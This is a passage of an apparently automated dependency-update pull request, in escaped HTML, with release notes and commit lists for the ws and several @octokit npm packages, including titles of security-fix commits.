(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94\"\u003e\u003ccode\u003ebca91ad\u003c/code\u003e\u003c/a\u003e [dist] 8.21.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/2b2abd458a1b647d0b6033bd62a619c36189839a\"\u003e\u003ccode\u003e2b2abd4\u003c/code\u003e\u003c/a\u003e [security] Limit retained message parts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/78eabe2a6677b231bf9c82601bde86ff91639490\"\u003e\u003ccode\u003e78eabe2\u003c/code\u003e\u003c/a\u003e [security] Add latest vulnerability to SECURITY.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/5d9b316230ea931532a6671cc450f18c11edd02f\"\u003e\u003ccode\u003e5d9b316\u003c/code\u003e\u003c/a\u003e [dist] 8.20.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086\"\u003e\u003ccode\u003ec0327ec\u003c/code\u003e\u003c/a\u003e [security] Fix uninitialized memory disclosure in \u003ccode\u003ewebsocket.close()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/ce2a3d62437995a47e6056d485a33d21b6a8f867\"\u003e\u003ccode\u003ece2a3d6\u003c/code\u003e\u003c/a\u003e [ci] Test on node 26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/58e45b872bb0f35a3edd553c27e105300a4f5bd0\"\u003e\u003ccode\u003e58e45b8\u003c/code\u003e\u003c/a\u003e [ci] Do not test on node 25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/5f26c245231a4b018479a9269e8c3da4773fe42f\"\u003e\u003ccode\u003e5f26c24\u003c/code\u003e\u003c/a\u003e [ci] Run the lint step on node 24\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/websockets/ws/compare/8.20.0...8.21.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e@​octokit/plugin-paginate-rest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e@​octokit/request's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.9\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.8...v10.0.9\"\u003e10.0.9\u003c/a\u003e (2026-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e switch to using the \u0026quot;content-type\u0026quot; package for content type parsing (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/807\"\u003e#807\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/a9f64a01694688cc726f14cc78bcd37a6676f388\"\u003ea9f64a0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/a9f64a01694688cc726f14cc78bcd37a6676f388\"\u003e\u003ccode\u003ea9f64a0\u003c/code\u003e\u003c/a\u003e fix(deps): switch to using the \u0026quot;content-type\u0026quot; package for content type parsin...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/4abc2809d2f6255a9bd6458e987c94faacce44e5\"\u003e\u003ccode\u003e4abc280\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency undici to v7.24.0 [security] (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/800\"\u003e#800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e@​octokit/request-error's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e 